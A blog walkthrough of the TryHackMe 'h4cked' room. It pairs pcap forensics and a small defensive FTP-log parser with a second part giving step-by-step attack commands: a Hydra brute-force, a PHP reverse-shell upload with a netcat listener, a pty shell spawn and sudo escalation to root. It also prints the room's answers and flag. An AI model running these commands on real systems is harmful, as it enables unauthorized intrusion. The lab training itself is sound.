The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning through a question-and-answer approach. It is a comfortable way to learn using pre-designed courses that include virtual machines (VMs) hosted in the cloud.
TryHackMe h4cked walkthrough
While a question-and-answer model does make learning easier, TryHackMe also allows users to create their own virtual classrooms to teach particular topics, enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.
Let's Start
Download the capture file here :- Click to download the Wireshark file
2) The attacker is trying to log into a specific service. What service is this?
When analyzing the pcap file, we can easily see that the attacker is trying to log into an FTP service, as there are many FTP requests and responses, as shown below.
Ans :- FTP
3) There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
All you need to answer this question is a Google search.
Ans :- Hydra
4) The attacker is trying to log on with a specific username. What is the username?
Simply type the name of the service you found in the first question as a display filter in Wireshark, and you will find the username that was used to log in.
Ans :- jenny
5) What is the user's password?
Search for a packet that says "Login successful" in the Info column, or follow the TCP stream of the connection that contains "Login successful".
Ans :- password123
6) What is the current FTP working directory after the attacker logged in?
We can see in the stream above that the PWD (print working directory) command was run. The response is "/var/www/html".
Ans :- /var/www/html
7) The attacker uploaded a backdoor. What is the backdoor's filename?
You can find the filename in the TCP stream above: "shell.php".
Ans :- shell.php
8) The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
To answer this question you need to see the contents of the file that was uploaded. If you apply a display filter of ftp-data, you can see two streams. The first is the directory listing; the second is the STOR command (the file upload).
If you right-click and follow the second stream you will be able to view the contents of the file and answer the question.
Ans :- http://pentestmonkey.net/tools/php-reverse-shell
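The same reconstruction done programmatically, as an added example that is not part of the original walkthrough or the room: a small Python parser over a constructed FTP control-channel transcript (the text you get from Follow TCP Stream, not the room's actual pcap) that counts failed logins, pulls out the credentials that finally worked, the PWD result and any STOR upload, and flags a script dropped into the web root. The sample transcript, the failure threshold and the web-root path are assumptions.

```python
import re

# Constructed FTP control-channel transcript (not from the room's pcap), laid
# out as Wireshark's "Follow TCP Stream" shows it; 331 replies are omitted.
SAMPLE_STREAM = """220 (vsFTPd 3.0.3)
USER jenny
PASS 123456
530 Login incorrect.
USER jenny
PASS letmein
530 Login incorrect.
USER jenny
PASS qwerty
530 Login incorrect.
USER jenny
PASS password123
230 Login successful.
PWD
257 "/var/www/html"
STOR shell.php
"""

def analyze_ftp_stream(stream, fail_threshold=3):
    """Reconstruct the session: failed logins, working credentials, cwd, uploads."""
    result = {"failed_logins": 0, "user": None, "password": None, "cwd": None,
              "uploads": [], "brute_force": False, "web_shell_upload": False}
    last_user = last_pass = None
    for line in stream.splitlines():
        reply = re.match(r"^(\d{3})[ -](.*)", line)
        if reply:                          # server reply: 3-digit code + text
            code, text = reply.groups()
            if code == "530":
                result["failed_logins"] += 1
            elif code == "230":            # the PASS just before this one worked
                result["user"], result["password"] = last_user, last_pass
            elif code == "257":            # PWD reply quotes the directory
                quoted = re.search(r'"([^"]*)"', text)
                result["cwd"] = quoted.group(1) if quoted else None
            continue
        verb, _, arg = line.strip().partition(" ")   # client command
        if verb.upper() == "USER":
            last_user = arg
        elif verb.upper() == "PASS":
            last_pass = arg
        elif verb.upper() == "STOR":
            result["uploads"].append(arg)
    result["brute_force"] = result["failed_logins"] >= fail_threshold
    result["web_shell_upload"] = (result["cwd"] or "").startswith("/var/www") and any(
        f.lower().endswith((".php", ".phtml")) for f in result["uploads"])
    return result
```

Calling analyze_ftp_stream(SAMPLE_STREAM) answers questions 2, 4, 5, 6 and 7 in one pass; raising fail_threshold tunes how many 530 replies count as a brute-force attempt.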
9) Which command did the attacker manually execute after getting a reverse shell?
Select a packet from after the shell was executed and follow its TCP stream. There you can find all the commands the attacker ran after getting the reverse shell. Thus "whoami" is the first command executed manually by the attacker.
Ans :- whoami
10) What is the computer's hostname?
Looking closely at the TCP stream above, the very first lines describe the OS, hostname, etc. As Linux is the OS, "wir3" must be the hostname.
Ans :- wir3
11) Which command did the attacker execute to spawn a new TTY shell?
Anyone with experience of reverse shells knows that the shell you get at first is unstable and needs to be stabilized. Most of the time a simple Python one-liner is used to do so, and we can see in the TCP stream above that this attacker used the same one.
Ans :- python3 -c 'import pty; pty.spawn("/bin/bash")'
12) Which command was executed to gain a root shell?
The full sudo command that lets you become the root user.
Ans :- sudo su
13) The attacker downloaded something from GitHub. What is the name of the GitHub project?
We can see a git clone done by the attacker (the "Reptile" GitHub project). Again, select a packet from after the shell was executed and follow the TCP stream.
Ans :- Reptile
14) The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
Follow the HINT.
Ans :- Rootkit
Task-2
1) Read the flag.txt file inside the Reptile directory
There are some steps to get the flag.txt:
- Step 1)
Run Hydra to brute force the login to the FTP service. Type the command
hydra -l jenny -P /home/hackerboy/Documents/rockyou.txt ftp://10.10.178.178
-l – the specific user to log in as
-P – the path to the file that contains the list of passwords to try
- Step 2)
Log in to the FTP service using the credentials you found through Hydra. On the terminal just type "ftp 10.10.178.178" without the double quotes, then provide the username and the password you brute-forced with Hydra.
So, we are now successfully logged in as jenny.
- Step 3)
Find the PHP reverse shell web shell on your Kali machine:
locate php-reverse-shell.php
- Step 4)
You can either edit the file in place or copy it somewhere and edit it there, setting the IP address (your own machine's IP address) and port number so that the reverse shell connects back to you. I chose to edit it on my own machine first.
- Step 5)
Upload the web shell and change its permissions to include execute rights. In the FTP session you are logged in to, type
put php-reverse-shell.php
ls
Now we need to change the web shell's permissions to make it executable, so type
chmod 777 php-reverse-shell.php
ls
As you can see, the permissions have changed.
- Step 6)
Let's start a netcat listener before triggering the web shell, so that we are able to catch the reverse shell. To start a netcat listener, make sure that you use the port number you entered when you edited the web shell in Step 4, and type
nc -lnvp 1234
Now trigger the web shell in your own browser by visiting the URL
http://10.10.178.178/php-reverse-shell.php
and hitting enter.
Go back to your netcat listener to check whether you have a reverse shell. It's amazing, let's celebrate, but wait, we will take some more time.
- Step 7)
Switch to a more stable shell by creating a new TTY shell; type
python3 -c 'import pty;pty.spawn("/bin/bash")'
For now we are "www-data", which does not have root privileges. We know that jenny has root privileges on the machine, so let us change the user to jenny and become root. It is as simple as follows.
su jenny
password :- 987654321 (found in Step 1 using Hydra)
We are given a root shell without much effort.
Type sudo -l to check what sudo privileges user jenny currently has.
- Step 8)
Type sudo su to change user to root, and whoami to check whether we successfully became root.
Look for the Reptile directory, as it was indicated that flag.txt is in that location; type
find / -type d -name Reptile 2> /dev/null
Go to the location /root/Reptile and run cat flag.txt to retrieve the contents of the flag.txt file.
Ans :- ebcefd66ca4b559d17b440b6e67fd0fd
Disclaimer
This was written for educational purposes and pentesting only.
The author will not be responsible for any damage!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!
All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about ethical hacking, security, penetration testing and malware analysis. Our hacking tutorials are against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
- Hacking Truth by Kumar Atul Jaiswal
I hope you liked this post; if so, do not forget to share it.
Thank you so much :-)